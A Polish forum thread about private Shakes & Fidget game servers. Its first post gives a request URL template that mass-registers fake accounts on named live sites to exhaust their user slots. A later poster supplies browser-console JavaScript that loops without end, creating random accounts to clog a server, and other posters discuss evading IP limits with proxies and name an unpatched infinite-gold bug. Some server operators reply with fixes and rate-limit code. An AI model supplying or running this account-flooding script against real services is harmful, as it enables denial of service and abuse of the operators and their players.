My-Sfgame tworzenie masy kont

[withelm]

Hej,

Po zapoznaniu się z ofertą my-sfgame.pl zauważyłem, że jest tam takie pole max. slot (maksymalna liczba zarejestrowanych użytkowników).

 

Chciałbym przedstawić link dzięki któremu jestem w stanie stworzyć fejk konto w 1 sekunde.

Należy wpisać poniższy link w przeglądarkę

 

https:// my-sfgame.pl/game/{serwer}/request.php?req=00000000000000000000000000000000001{userName}%3B{password}%3B{adresEmail}%3B%3B%3B4%3B1%3B3%3B2/103/102/7/105/6/4/16/1/%3B&random=%2&rnd=596075641453809909478

 

Gdzie:

{serwer} - to dana nazwa serwera

{userName} - nazwa nowego użytkownika

{password} - przykładowe hasło

{adresEmail} - adres email.

 

Uwaga userName jak i adresEmail muszą być unikatowe. Nie można utworzyć 2 kont z takim samym email jak i loginem. 

 

 

Błąd ten może powodować niesłuszne blokować rejestrowanie się nowych użytkowników na wyżej wymienionym serwisie. 

 

Pozdrawiam,

withelm

[Norbertsons]

Działa, świetny poradnik

Można stworzyć bota, który będzie w nieskończoność tworzył takie konta.

[withelm]

^

Nie rozpędzaj się tak.

U Cb jest ta sama podatność.

http: //norbisf.pl/play/albatroz/req.php?req=00000000000000000000000000000000001test1%3B1234qwer%[email protected]%3B%3B%3B6%3B2%3B3%3B3/106/5/2/1/3/2/5/1/%3B&random=%2&rnd=7294396501453813859666

Tak mozna swtorzyć bota który by tworzył takie konta i zapychał serwery
Jednak kodu już do takiego bota nie dam (:

[Łysy102]

^

Nie rozpędzaj się tak.

U Cb jest ta sama podatność.

http: //norbisf.pl/play/albatroz/req.php?req=00000000000000000000000000000000001test1%3B1234qwer%[email protected]%3B%3B%3B6%3B2%3B3%3B3/106/5/2/1/3/2/5/1/%3B&random=%2&rnd=7294396501453813859666

 

Tak mozna swtorzyć bota który by tworzył takie konta i zapychał serwery

Jednak kodu już do takiego bota nie dam (:

 

Miło że jest kolejna osoba która pokazuje jak bardzo są słabe prywatne serwery sf

Jeszcze z dwa poradniki i wszystkie te serwery padną

[Pan Marcel]

^

Nie rozpędzaj się tak.

U Cb jest ta sama podatność.

http: //norbisf.pl/play/albatroz/req.php?req=00000000000000000000000000000000001test1%3B1234qwer%[email protected]<script data-cfhash='f9e31' type="text/javascript"> /* */</script>%3B%3B%3B6%3B2%3B3%3B3/106/5/2/1/3/2/5/1/%3B&random=%2&rnd=7294396501453813859666

 

Tak mozna swtorzyć bota który by tworzył takie konta i zapychał serwery

Jednak kodu już do takiego bota nie dam (:

 

Ale ja dam

 

Kod w javascript. Wystarczy wypelnic link do pliku req/request serwera, i wklejic w konsole przegladarki

var a = function get(url){
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.onreadystatechange = function() { 
        if (xmlHttp.readyState == 4 && xmlHttp.status == 200){
            console.log(xmlHttp.responseText);
			setTimeout(loop(), 10);
		}
    }
    xmlHttp.open("GET", url, true);
    xmlHttp.send(null);
}
var randomString = function randomString(length) {
    return Math.round((Math.pow(36, length + 1) - Math.random() * Math.pow(36, length))).toString(36).slice(1);
}
var loop = function loop(){

	var server = "http://server.pl/reuqest.php";
	
	var name = randomString(12);
	var email = randomString(10) + "@" + randomString(10) + ".com";
	 
	var url = server + "?req=00000000000000000000000000000000001" + name + "%3B1234qwer%3B" + email + "%3B%3B%3B6%3B2%3B3%3B3/106/5/2/1/3/2/5/1/%3B&random=%2&rnd=7294396501453813859666"
	
	a(url);
}

loop();

[GILUxDILU]

Bardzo dobry poradnik, mam nadzieje ze te wszystkie gotowce padną

[withelm]

@GILUxDILU można to łatwo "załatać". Np dać ograniczoną liczbę tworzenia kont z danego IP na dany okres :P. Jednak to by wymagało napisania ładnej metody (:.

 

Ładnym rozwiązaniem było by tworzyć konta na sf po potwierdzeniu adresu email :P

[Pan Marcel]

Zeus sobie z tym poradzil w ten sposob: 

$ip = $_SERVER['REMOTE_ADDR'];

$ipc = $db->prepare ( "SELECT user_id FROM user_data WHERE last_ip = :ip" );
$ipc->bindParam ( ':ip', $ip );
$ipc->execute ();
if($ipc->rowCount () >= 3)
{
	$ret = array (
		$ERR_ACCOUNTS_PER_IP
	);
	break;
}

Nie wiem po cholere uzywa prepared statements ale mniejsza z tym

 

Z reszta to idzie latwo obejsc, przy logowaniu zmienia sie to ip, wystarczy robic konto, potem logowac sie na innym IP za pomoca proxy, czy czegokolwiek

[SfPrivatePl]

Dobry poradnik.

Dziękuję - wiem co naprawić.

[withelm]

@pan Marcel Dobrze, że istnieją serwery proxy
Akurat te prepare (bindowanie) to jest bardzo mądre z jego strony

 

Jednak blokada na IP była by dobra jakieś 10 lat temu teraz w dobie zmiennego IP to jest słabe rozwiązanie

[Pan Marcel]

Dobry poradnik.

Dziękuję - wiem co naprawić.

 

Nadal masz buga na nieskonczone grzybki i zloto, jak kazdy inny serwer ktory sprawdzalem

 

 

@pan Marcel Dobrze, że istnieją serwery proxy

Akurat te prepare (bindowanie) to jest bardzo mądre z jego strony

 

Jednak blokada na IP była by dobra jakieś 10 lat temu teraz w dobie zmiennego IP to jest słabe rozwiązanie

 

Wlasnie ze nie jest to madre rozwiazanie. Prepared statements uzywa sie jako zabezpieczenie przed sql injection, a przed czym on sie zabezpiecza, jak bierze jedynie adress IP ktory byl uzywany w polaczeniu TCP? Zwalnia to tylko baze dancyh

[SfPrivatePl]

Nadal masz buga na nieskonczone grzybki i zloto, jak kazdy inny serwer ktory sprawdzalem

 

 

 

Wlasnie ze nie jest to madre rozwiazanie. Prepared statements uzywa sie jako zabezpieczenie przed sql injection, a przed czym on sie zabezpiecza, jak bierze jedynie adress IP ktory byl uzywany w polaczeniu TCP? Zwalnia to tylko baze dancyh

Dziękuję za informację.

 

Urzekła mnie historia tych przepięknych elfów o których mowa we Władcy Pierścieni. A Was?

 

 

Błąd zostanie zaraz naprawiony. Chwilowa przerwa techniczna będzie.

Pozdrowienia!

 

­

[withelm]

@Pan Marcel
Ups. Tzn nie znam się na php. Jedynie co z tego wyciągnąłem, że binduje coś na stringu. Człowiek całe życie się uczy.
Btw nie można jakoś "nadpisać" pakietu aby zamiast adresu IP był jakiś mój własny stwór? (Mało siedzę w requesty i jestem ciekaw jak to działa).

[Pan Marcel]

@Pan Marcel

Ups. Tzn nie znam się na php. Jedynie co z tego wyciągnąłem, że binduje coś na stringu. Człowiek całe życie się uczy.

Btw nie można jakoś "nadpisać" pakietu aby zamiast adresu IP był jakiś mój własny stwór? (Mało siedzę w requesty i jestem ciekaw jak to działa).

 

Nie da rady, $_SERVER['REMOTE_ADDR'] daje adress z polaczenia TCP. 

[Norbertsons]

Wkleiłem ten kod do konsoli, zmieniłem link i nie działa

[Seremo]

Wkleiłem ten kod do konsoli, zmieniłem link i nie działa

Chyba jednak działa.

[Norbertsons]

Jak to zrobic by samo tworzylo konta?

[Seremo]

Jak to zrobic by samo tworzylo konta?

Wystarczy wpisać odpowiedni link 

[Norbertsons]

Dobry wpisałem i wkleiłem do kosoli

[Pan Marcel]

Dobry wpisałem i wkleiłem do kosoli

 

Ty prowadzisz serwer, i nie potrafisz uzyc prostego skryptu z dwudziestoma linjami?

[withelm]

Lol nie wiedziałem, że prosta obserwacja spowoduje taki bum Postaram się dzisiaj wieczorem napisać ładny program który będzie tworzył takie konta

[Norbertsons]

@Pan Marcel

Zgadza się

[SfPrivatePl]

Jak to zrobic by samo tworzylo konta?

Spróbuj na on-game, może zadziała.

 

­

[Raytlion]

Jak to zrobic by samo tworzylo konta?

Myślę, że odpowiedź której "geniuszu" udzielasz wszystkim:

 

Na pewno wiesz gdzie to jest skoro udało Ci się stworzyć serwer prywatny.

 

Lecz delikatnie przerobiona Cię zadowoli.

Na pewno wiesz jak to zrobić, w końcu posiadasz własny serwer.

 

Co do poradnika, przyda się, może zniechęci niektórych do tworzenia pseudoli.

[Truskaffek]

Haha. Dobry poradnik